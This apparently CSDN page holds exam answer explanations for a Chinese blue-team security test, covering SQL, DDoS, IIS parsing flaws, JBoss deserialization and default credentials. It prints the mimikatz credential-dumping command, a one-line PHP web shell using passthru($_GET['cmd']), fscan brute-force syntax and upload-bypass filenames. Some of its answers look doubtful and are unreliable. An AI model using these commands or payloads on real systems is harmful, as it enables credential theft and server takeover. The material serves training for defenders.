❌ D. 代理转发(需配合其他工具如Proxifier)

📌 经典命令

bash复制mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords


8. 命令执行函数

A. pcntl_exec()

C. popen()

D. passthru()

❌ B. phpinfo()(仅信息输出)

📌 风险示例

php复制<?php

passthru($_GET['cmd']); // 直接执行用户输入命令

?>


SQL查询问题:数学最高分姓名

B. select name where math is (select max(math)...)(语法错误,is用于NULL判断)

✅ 其他选项正确(A/C/D均等价,=in匹配唯一值)

📌 解析

  • 错误原因IS用于比较NULL,如math IS NULL
  • 正确语法WHERE math = (SELECT MAX(math) ...)

33. 微警CMS存在哪些漏洞?(1.5分)

B. 低权限后台getshell

D. 1.8.2后台getshell

❌ A. 0.8后台任意文件删除(需具体漏洞公告验证)

❌ C. 0.7 SQL注入漏洞(未广泛证实)

📌 解析

微警CMS(微擎CMS)历史漏洞主要集中在后台权限管理缺陷:

  • 低权限后台getshell:低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。
  • 1.8.2版本后台getshell:管理后台存在未授权访问或文件上传校验不严,导致攻击者植入Webshell。
    其他选项需结合CVE编号验证,部分版本漏洞存在争议。

33. 以下关于CC攻击说法正确的是?(1.5分)

C. CC攻击需要借助代理进行

D. CC攻击难以获取目标机器的控制权

❌ A. CC攻击最早在国外大面积流行(起源于国内“挑战黑洞”攻击)

❌ B. CC攻击利用TCP协议缺陷(基于应用层HTTP请求耗尽资源)

📌 解析

  • CC攻击(Challenge Collapsar):模拟大量合法请求(如HTTP GET/POST),耗尽服务器资源(CPU、带宽、连接数)。
  • 特点
    • 需通过代理或僵尸网络隐藏攻击源IP。
    • 仅导致服务拒绝,无法直接控制目标机器。

29. 在MySQL中,数据类型大致分为?(1.5分)

A. 浮点型(FLOAT、DOUBLE、DECIMAL)

B. 字符串(CHAR、VARCHAR、TEXT)

C. 整型(INTEGER、INT、BIGINT)

D. 日期/时间(DATETIME、DATE、TIMESTAMP)

📌 解析

MySQL数据类型分类:

  • 数值型INTFLOATDECIMAL(精确小数)。
  • 字符型CHAR(定长)、VARCHAR(变长)、BLOB/TEXT(大文本)。
  • 日期型DATE(年月日)、TIME(时分秒)、TIMESTAMP(时间戳)。
  • 其他ENUM(枚举)、JSON(结构化数据)。

30. fscan如何指定密码来进行爆破?(1.5分)

C. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt

❌ A. -pwd参数需指定具体密码(非文件路径)

❌ B. -userf仅指定用户名字典

❌ D. 缺少密码参数,语法错误

📌 解析

fscan常用参数:

  • -pwdf:指定密码字典文件路径(每行一个密码)。
  • -userf:指定用户名字典文件路径。
    示例:fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt

31. 修改Apache的默认网页目录需要配置哪些参数?(1.5分)

B. Directory(目录权限配置)

D. DocumentRoot(主目录路径)

❌ A. sshd_config(SSH服务配置文件)

❌ C. logs(日志目录,非核心配置)

📌 解析

Apache配置示例(httpd.conf 或站点配置文件):

apache复制DocumentRoot "/var/www/html"

<Directory "/var/www/html">

Options Indexes FollowSymLinks

AllowOverride All

Require all granted

</Directory>


27. 在Windows系统中,下列关于安全策略的功能特点哪些说法是正确的?(1.5分)

A. 本地安全策略设置分为账户策略、本地策略等5部分

B. 成员服务器的本地策略被域策略覆盖

C. 安全设置通过本地安全策略控制台管理

❌ D. 描述不完整(需结合组策略管理)

📌 解析

  • 本地安全策略:路径为secpol.msc ,管理密码复杂度、审计策略、用户权限分配等。
  • 组策略优先级:域策略 > 站点策略 > 组织单元策略 > 本地策略。

28. JOnAS默认用户名密码有?(1.5分)

A. jadmin/jonas

C. jonas/jonas

❌ B. admin/123456(常见弱口令,非默认)

❌ D. tomcat/tomcat(Tomcat默认凭证)

📌 解析

JOnAS(Java Open Application Server)默认凭证:

  • jadmin/jonas:管理员账户。
  • jonas/jonas:普通用户账户。
    建议安装后立即修改默认密码。

24. 下列常用端口,可能用于反射放大DDoS攻击的有?(1.5分)

B. memcache 11211/udp

C. NTP 123/udp

❌ A. DNS 53/tcp(UDP协议更常用于反射)

❌ D. HTTPS 443/tcp(TCP协议无法放大流量)

📌 解析

  • Memcached:无认证UDP服务,单请求可触发数万倍响应(CVE-2018-11321)。
  • NTPmonlist命令响应包放大效果显著。
    其他高危协议:SSDP(1900/udp)、SNMP(161/udp)。

25. 在自动更新的对话框中的选择项包括下列哪些?(1.5分)

A. 自动(推荐)

B. 下载更新,由用户决定何时安装

C. 仅通知可用更新

D. 关闭自动更新

📌 解析

Windows更新选项(截至2025年):

  1. 自动安装更新:系统后台下载并安装。
  2. 下载但手动安装:用户选择时间重启。
  3. 仅通知:用户需主动下载。
  4. 禁用更新:需通过组策略或注册表实现。

26. IIS6.x解析漏洞利用方式有哪些?(1.5分)

A. 文件名(如test.asp;.jpg

D. 文件夹(如/upload/test.asp/1.jpg

❌ B. 默认类型名(IIS6无此机制)

❌ C. 默认扩展名(与漏洞无关)

📌 解析

  • 分号截断test.asp;.jpg 被解析为ASP文件。
  • 目录解析/asp目录/1.jpg 被当作ASP执行。
    修复建议:禁用非必要脚本映射,升级至IIS7+。

22. Websphere Java反序列化(CVE-2015-7450)漏洞影响版本有?(1.5分)

A. 8.5版

B. 8.5.5传统和自由

C. 8.0版

D. 7.0版

📌 解析

CVE-2015-7450:影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。

  • 漏洞机制:Apache Commons Collections库反序列化漏洞。
  • 修复方案:升级至Fix Pack 8.5.5.9+或应用官方补丁。

23. JBoss反序列化漏洞说法正确的是?(1.5分)

C. JBoss4.x访问/jbossmq-httpil/HTTPServerILServlet存在漏洞

D. JBoss5.x/6.x访问/invoker/readonly返回500可能存在漏洞

❌ A. JMX Invoker漏洞需关闭jmx-invoker-service.xml

❌ B. WLS Security漏洞属于WebLogic(非JBoss)

📌 解析

  • JBoss反序列化漏洞
    • 4.x版本/jbossmq-httpil/HTTPServerILServlet未授权访问,可执行任意代码。
    • 5.x/6.x版本/invoker/readonly接口反序列化漏洞(CVE-2017-12149)。
      修复建议:删除或限制访问高危接口,升级至EAP 7+。

20. 下面哪个是对SSRF的防御?(1.5分)

A. 限制IP(禁止内网IP请求)

B. 限制端口(仅允许80/443)

C. 过滤返回信息(避免敏感数据泄露)

❌ D. 过滤POST参数(SSRF通常通过URL触发)

📌 解析

SSRF防御策略

  • 协议白名单:仅允许HTTP/HTTPS。
  • 目标限制:禁止访问内网IP和非常用端口。
  • 响应过滤:屏蔽错误信息中的内网拓扑数据。

21. 关于漏洞修复以下说法正确的是?(1.5分)

A. 高稳定性环境需综合评估修复优先级

B. 修复可能影响业务连续性

❌ C. 极高危漏洞必须修复(不可忽略)

❌ D. Linux无需频繁升级(仍需定期更新)

📌 解析

漏洞修复原则:

  • 风险评估:结合CVSS评分、资产价值、利用可能性排序。
  • 测试验证:生产环境需在测试环境验证补丁兼容性。
  • 备份回滚:修复前备份系统,制定回滚方案。

17. 关于OpenSSL心脏出血漏洞修复说法正确的是?(1.5分)

C. 升级后需生成新密钥(原密钥可能泄露)

D. 升级至最新版本可解决

❌ A. 旧密钥可继续使用(存在被窃取风险)

❌ B. 用户需改密(漏洞泄露内存数据,非密码)

📌 解析

Heartbleed(CVE-2014-0160)修复步骤

  1. 升级OpenSSL至1.0.1g+或1.0.2+。
  2. 吊销旧证书并重新签发。
  3. 重启服务确保新版本生效。

18. IIS中间件文件上传漏洞利用方式有哪些?(1.5分)

A. 目录解析(a.asp/ 下任意文件解析为ASP)

D. 分号截断(test.asp;.jpg

❌ B. 路径后加.php(IIS6不支持PHP解析)

❌ C. 路径前加/php(无实际意义)

📌 解析

  • IIS6解析漏洞
    • 文件夹解析/asp_dir/1.jpg 被当作ASP执行。
    • 分号截断test.asp;.jpg 忽略分号后内容。
      修复方案:禁用非必要脚本映射,使用URL重写过滤异常请求。
39. WebLogic密码复杂度配置

A. 控制台修改“最小口令长度”

D. 依据weblogic.system.minPasswordLen=8

📝 解析

  • 正确配置路径:WebLogic管理控制台中,通过【安全领域】→【DefaultAuthenticator】→【提供程序特定】设置密码策略(如最小长度)。
  • 配置文件:密码策略通常存储在config.xml 或领域配置中,而非weblogic.properties
  • 基线依据weblogic.system.minPasswordLen=8 是常见安全基线参数,需通过脚本或控制台生效。

30. 触发解析漏洞的操作

A. xxx.jpg%00.php (空字节截断)

B. xxx.jpg/1.php (路径解析)

C. xxx.asp;.jpg (分号截断,IIS 6.0)

D. test.php.php123 (畸形后缀,Apache多后缀解析)

📝 原理

  • 空字节截断:利用%00截断后续字符(如a.jpg%00.php 被解析为.php)。
  • 路径解析:Apache将a.jpg/1.php 视为PHP文件执行。
  • 分号截断:IIS 6.0将a.asp;.jpg 解析为.asp
  • 多后缀解析:Apache可能将a.php.jpg 解析为PHP文件。

27. MySQL 5.0以上与以下版本注入差异

C. 5.0以下无information_schema,需暴力跑表名

📝 关键区别

  • MySQL ≥5.0:默认包含information_schema系统库,可直接查询数据库、表、列名。
  • MySQL <5.0:无此系统库,需通过字典爆破或盲注猜测表名。
  • 其他选项:多用户操作模式与版本无关,属干扰项。

28. Linux可读取的分区类型

A. ext3(原生支持)

B. FAT16(需vfat驱动)

C. FAT32(同FAT16,需挂载)

D. NTFS(需ntfs-3g驱动)

📝 说明

  • ext3/4:Linux默认文件系统,直接读写。
  • FAT/NTFS:需内核模块或第三方工具支持(如ntfs-3g)。

23. Oracle物理组件

A. 控制文件

C. 日志文件

D. 数据文件

📝 物理结构

  • 控制文件:存储数据库元数据(如数据文件位置)。
  • 日志文件:记录事务变更(Redo Log)。
  • 数据文件:存储实际数据(表、索引)。
  • 管理后台:属逻辑组件(如Oracle Enterprise Manager)。

相关文章:

奇安信 2025 年护网蓝队初选笔试题(附答案解析)

&#x1f525; 爆款 CSDN 题库 | 超全护网蓝队笔试真题 | 含详细答案解析 &#x1f525; 熬夜为大家整理了 奇安信 2025 年护网蓝队初选笔试题&#xff0c;&#xff08;关注我我会持续更新&#xff09;涵盖 SQL 注入、Web 安全、渗透测试、二进制安全 等核心知识点&#xff0c;…...

jdk-21_linux-x64_bin.tar.gz Linux jdk21压缩包安装保姆级(详细安装教程)

jdk-21_linux-x64_bin.tar.gz 解压版详细安装教程 一、简洁版&#xff08;需要对 Linux 操作有一定基础&#xff09;二、图文详细教程1、前置准备2、解压安装3、配置环境变量4、验证成功 官网下载地址&#xff1a; https://www.oracle.com/java/technologies/downloads/#java2…...

第6章 定时器计数器

目录 6.1 定时计数器的结构框图 6.2 定时器的控制字 6.2.1 TMOD&#xff1a;工作方式控制寄存器 6.2.2 定时/计数器控制寄存器TCON 6.3 定时/计数器的4种工作方式 6.3.1 方式0、方式1&#xff08;13位、16位定时计数方式&#xff09; 6.3.2 方式2(常数自动重装入) 6.3.3 方…...

回归预测 | Matlab实现GWO-BP-Adaboost基于灰狼算法优化BP神经网络结合Adaboost思想的回归预测

回归预测 | Matlab实现GWO-BP-Adaboost基于灰狼算法优化BP神经网络结合Adaboost思想的回归预测 目录 回归预测 | Matlab实现GWO-BP-Adaboost基于灰狼算法优化BP神经网络结合Adaboost思想的回归预测回归效果基本介绍GWO-BP-Adaboost:基于灰狼算法优化BP神经网络结合Adaboost思想…...

蓝桥杯真题0团建dfs+哈希表/邻接表

dfs邻接表储存或者哈希表的运用&#xff0c;考察我们对数据的存储 本题核心就是在求从根节点开始的两棵树相同的最长序列&#xff0c;首先确定用dfs进行深搜&#xff0c;对于节点的形式可以用邻接表&#xff0c;邻接矩阵&#xff0c;哈希表来进行存储数据。下面看代码 邻接表 …...

系统架构的评估的系统的质量属性

体系结构苹果可以针对一个体系结构&#xff0c;也可以针对一组体系结构。 体系结构评估过程中&#xff0c;评估人员所关注的是系统的质量属性&#xff0c;所有评估方法所普遍关注的质量属性有以下几个&#xff1a;性能、可靠性&#xff08;容错&#xff0c;健壮性&#xff09;…...

论文阅读:基于超图高阶表示的WSI生存预测

Generating Hypergraph-Based High-Order Representations of Whole-Slide Histopathological Images for Survival Prediction 文章目录 论文介绍快速阅读摘要1 引言2 相关工作2.1 生存分析2.2 超图学习的准备工作 3 方法3.1 patch采样和低级特征提取3.2 多超图学习3.2.1 多超…...

NLP常见任务专题介绍(1)-关系抽取(Relation Extraction, RE)任务训练模板

📌 关系抽取(Relation Extraction, RE)任务训练示例 本示例展示如何训练一个关系抽取模型,以识别两个实体之间的关系。 1️⃣ 任务描述 目标:从文本中提取两个实体之间的语义关系,例如 “人物 - 组织”、“药物 - 疾病”、“公司 - 创始人” 等。输入:句子 + 标注的实…...

27. Harmonyos Next仿uv-ui 组件NumberBox 步进器组件禁用状态

温馨提示&#xff1a;本篇博客的详细代码已发布到 git : https://gitcode.com/nutpi/HarmonyosNext 可以下载运行哦&#xff01; 文章目录 1. 组件介绍2. 效果展示3. 禁用状态设置3.1 整体禁用3.2 输入框禁用3.3 长按禁用 4. 完整示例代码5. 知识点讲解5.1 禁用状态属性5.2 禁用…...

docker无法pull镜像问题解决for win10

docker无法pull镜像问题解决for win10 问题原因分析解决方法 问题 在win10系统上安装好doker-desktop后ping registry-1.docker.io不同&#xff0c;并且也无法登陆hub.docker.com, 使用docker pull xx也无法正常下载 原因分析 hub.docker.com在2024年5月之后&#xff0c;国内…...

批量将 Excel 转换 PDF/Word/CSV以及图片等其它格式

Excel 格式转换是我们工作过程当中非常常见的一个需求&#xff0c;我们通常需要将 Excel 转换为其他各种各样的格式。比如将 Excel 转换为 PDF、比如说将 Excel 转换为 Word、再比如说将 Excel文档转换为图片等等。 这些操作对我们来讲都不难&#xff0c;因为我们通过 Office 都…...

Node.js调用DeepSeek Api 实现本地智能聊天的简单应用

在人工智能快速发展的今天&#xff0c;如何快速构建一个智能对话应用成为了开发者们普遍关注的话题。本文将为大家介绍一个基于Node.js的命令行聊天应用&#xff0c;它通过调用硅基流动&#xff08;SiliconFlow&#xff09;的API接口&#xff0c;实现了与DeepSeek模型的智能对话…...

Mac同时安装jdk8和jdk17,默认选择jdk8

在Mac上同时安装JDK 8和JDK 17&#xff0c;并设置默认版本为JDK 8&#xff0c;可以按照以下步骤操作&#xff1a; 一、下载并安装JDK 8和JDK 17 下载JDK 8 访问Oracle JDK下载页面。在“Java SE Archive Downloads”部分&#xff0c;找到JDK 8的下载链接。选择适合您Mac芯片类…...

【Zinx】Day5-Part3:Zinx 的连接管理

目录 Day5-Part3&#xff1a;Zinx 的连接管理创建连接管理模块将连接管理模块集成到 Zinx 当中将 ConnManager 集成到 Server 当中在 Connection 的工厂函数中将连接添加到 ConnManagerServer 中连接数量的判断连接的删除 补充&#xff1a;连接的带缓冲发包方式补充&#xff1a…...

网络安全之RSA算法

1978年就出现了这种算法&#xff0c;它是第一个既能用于数据加密也能用于数字签名的算法。它易于理解和操作&#xff0c;也很流行。算法的名字以发明者的名字&#xff08;RonRivest&#xff0c;AdiShamir和LeonardAdleman&#xff09;命名。但RSA的安全性一直未能得到理论上的证…...

Unity Dots

文章目录 什么是DotsDOTS的优势ECS&#xff08;实体组件系统&#xff09;Job System作业系统Burst编译器最后 什么是Dots DOTS&#xff08;Data-Oriented Technology Stack&#xff09;是Unity推出的一种用于开发高性能游戏和应用的数据导向技术栈&#xff0c;包含三大核心组件…...

设计模式-结构型模式-桥接模式

概述 桥接模式 &#xff1a;Bridge Pattern&#xff1a; 是一种结构型设计模式。 旨在将抽象部分与实现部分分离&#xff0c;使它们可以独立变化。 它通过组合代替继承&#xff0c;解决类爆炸问题&#xff0c;并提高系统的灵活性和可扩展性。 组成部分 【抽象部分】&#xff08…...

Ultravox:融合whisper+llama实现audio2text交互

Ultravox是由Fixie AI开发的一种创新型多模态大语言模型,专为实时语音交互设计。与传统的语音交互系统不同,Ultravox无需单独的语音识别(ASR)阶段,可以直接理解文本和人类语音,实现更快速、更自然的交互体验。Ultravox v0.5在语音理解基准测试中超越了OpenAI的GPT-4o Realt…...

【MySQL_06】表的相关操作

文章目录 一、表的基本操作1.1 创建表1.2 修改表结构1.2.1 添加列1.2.2 删除列1.2.3 修改列1.2.4 重命名列1.2.5 添加约束 1.3 删除表1.4 查询表结构1.5 重命名表1.6 复制表1.6.1 仅复制结构1.6.2 复制结构及数据 1.7 清空表数据 二、数据完整性约束2.1 主键约束2.2 唯一约束2.…...

clickhouse集群部署保姆级教程

ClickHouse安装 版本要求 23.8及之后的版本 硬件要求 三台机器 建议配置 磁盘 ssd 500G内存 32gcpu 16c 最低配置 磁盘 机械硬盘 50G内存 4gcpu 4c 容量规划 一亿条数据大约使用1TB磁盘容量 参考官方容量推荐 安装包准备 zookeeper安装 zookeeper需要java启动&…...

驾培市场与低空经济无人机融合技术详解

随着科技的飞速发展和社会的不断进步&#xff0c;驾培市场正面临着前所未有的变革。传统汽车驾驶培训已不再是唯一的选择&#xff0c;无人机驾驶等新兴领域正逐渐成为驾培市场的重要组成部分。本报告旨在探讨驾培市场与低空经济的融合发展&#xff0c;特别是应用型人才培养与驾…...

pandas-基础(数据结构及文件访问)

1 Pandas的数据结构 1.1 Series 特点&#xff1a;一维的数据型对象&#xff0c;包含一个值序列和数据标签(即索引&#xff09; 创建Series&#xff1a; pandas.Series(dataNone, indexNone, dtypeNone, nameNone, copyFalse, fastpathFalse) 参数说明&#xff1a; data&a…...

简单记录一下Oracle数据库与mysql数据库注入的不同。

Oracle数据库的注入比mysql较复制。 一确定注入点&#xff1a;与mysql一样。 and 11 -- #文章有出现. and 12 -- #文章不见了。 二。确定列数。 ’order by 1&#xff0c;2 -- #没问题 order by 1,2,3 -- #保错&#xff0c;所以有两列。 三&#xff0c;所有uni…...

前端小食堂 | Day11 - Vue.js の烹饪秘籍

&#x1f3a8; 今日主菜&#xff1a;Vue 常用技巧全家桶 1. 响应式烹饪秘籍 <script setup> // &#x1f373; 精准控制响应式 const counter ref(0); // 基本类型用ref const user reactive({ name: 小明, age: 18 }); // 对象用reactive // &#x1f525; 自…...

如何将本地已有的仓库上传到gitee (使用UGit)

1、登录Gitee。 2、点击个人头像旁边的加号&#xff0c;选择新建仓库&#xff1a; 3、填写仓库相关信息 4、复制Gitee仓库的地址 5、绑定我们的本地仓库与远程仓库 6、将本地仓库发布&#xff08;推送&#xff09;到远程仓库&#xff1a; 注意到此处报错&#xff…...

多方安全计算(MPC)电子拍卖系统

目录 一、前言二、多方安全计算(MPC)与电子拍卖系统概述2.1 多方安全计算(MPC)的基本概念2.2 电子拍卖系统背景与需求三、MPC电子拍卖系统设计原理3.1 系统总体架构3.2 电子拍卖中的安全协议3.3 数学与算法证明四、数据加解密模块设计五、GPU加速与系统性能优化六、GUI设计与系…...

Day04 模拟原生开发app过程 Androidstudio+逍遥模拟器

1、用Androidstudio打开已经写好了的music项目 2、逍遥模拟器打开apk后缀文件 3、在源文件搜索关键字 以后的测试中做资产收集...

C# Channel

核心概念创建Channel无界通道有界通道FullMode选项 生产者-消费者模式生产者写入数据消费者读取数据 完整示例高级配置优化选项&#xff1a;取消操作&#xff1a;通过 CancellationToken 取消读写。 错误处理适用场景Channel的类型创建Channel写入和读取消息使用场景示例代码注…...

17网商品列表的HTML结构是怎样的?

根据搜索结果&#xff0c;目前没有直接提供17网&#xff08;17zwd&#xff09;商品列表的HTML结构的详细信息。不过&#xff0c;我们可以根据一般的电商网站结构进行推测&#xff0c;并结合已有的爬虫代码示例来分析可能的HTML结构。 17网商品列表的HTML结构推测 一般来说&am…...

若依ry-vue分离板(完整版)前后端部署

目录 1.目标 2.准备工作 3.源码下载 4.整理前后端目录 5.先部署后端 &#xff08;1&#xff09;导入数据库 &#xff08;2&#xff09;改代码数据库配置 &#xff08;3&#xff09;运行redis &#xff08;4&#xff09;运行执行文件 &#xff08;5&#xff09;后端启…...